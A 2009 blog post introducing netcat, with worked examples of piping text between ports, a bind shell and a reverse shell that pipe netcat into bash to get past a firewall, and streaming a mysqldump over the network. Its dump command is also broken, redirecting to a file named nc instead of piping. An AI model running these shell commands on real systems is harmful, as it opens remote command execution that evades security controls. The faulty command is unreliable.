Netcat a powerfool tool (2009)

A fairly high level component to Unix and networking magicks. Not for the novice, much.

Netcat (nc(1)) is, as the name suggests, a version of cat(1) that works over network sockets. In fact it is likely the lowest-level networking tool you are going find or be able to install without scripting one yourself. Netcat may either send to or listen on a port (on an IP/hostname) and then acts exactly like cat(1).

So, rather than cat’ing a file from one folder to another, you cat a file (everything in Unix is a file, right?) to … somewhere else. In it’s most basic form:

  lorelei-lee:~/Work/adricnet/trunk adric$ cat | nc localhost 33333

  foo #typed

  ^C punt!

  lorelei-lee:~/Desktop adric$ nc -l -p 33333

  foo #appears

  ^C punt!

Plenty more in the man page or on example pages that Google easily, and maybe here later (FIXME). I’m pretty sure there are IPv6 versions by now, although this one seems not to be. I’m equally certain it’s available for [Windows], maybe even without [Cygwin] (LINKME).

Advanced Incantations

And as neat as it is to be able to simulate talk(1) without buffering or [Tar Over SSH] without security .. nc’s real utility is in it’s ability to set up things that you might not have been to do otherwise. And thereby really blowing holes in lots of security models.

Reverse Shells

You can simulate a remote shell by piping nc to (eg) bash:

  lorelei-lee:~/Work/adricnet/trunk adric$ cat | nc localhost 33333

  ls #typed


  lorelei-lee:~/Desktop adric$ nc -l -p 33333 | bash

  #output here:

  Etch SE                                 Syllable
  Icon?                                   Syllable 0.6.4
  OpenSolaris                             WinXP
  Project LRNJ- Classic Hiragana Dream    bugg
  Project LRNJ- Slime Forest              evo

Frighteningly enough it works the other way too. Lets say you have the ability to execute commands on the server, but you can’t receive connections there because of some firewall. Just switch it about. Timing is a little tricky, so listen first:

  client# nc -l -p 33333
  server$ nc localhost 33333 | bash
  #then commands typed on client 
  #are executed and output on the server:
  uid=501(adric) gid=501(adric) groups=501(adric), 81(appserveradm), 79(appserverusr), 80(admin)

  11:37  up 19 days,  2:44, 4 users, load averages: 1.20 1.25 1.26

Reverse MySQL Dump

Once upon a time I was transferring customer SQL data from one server to another. Thing was, there was not enough diskspace free on the old server to mysqldump(1) out the gibibytes of stuff. and, mysql was configured to disallow remote acces by any user we had access to use. So, at the suggestion of a local wizard, we set up a reverse mysqldump with netcat, dumping from mysqldump straight to nc and across the wire (and the country, of course).

  client# nc -l -p 33333 > sqldump.sql

  server$ mysqldump -u root -p --databases > nc localhost 33333

The wizard actually recommends piping a ‘gzip’ in the midst for compression if it’s going to be much data.


Netcat and Reverse Telnet on O’Reily Network:

Written on November 11, 2009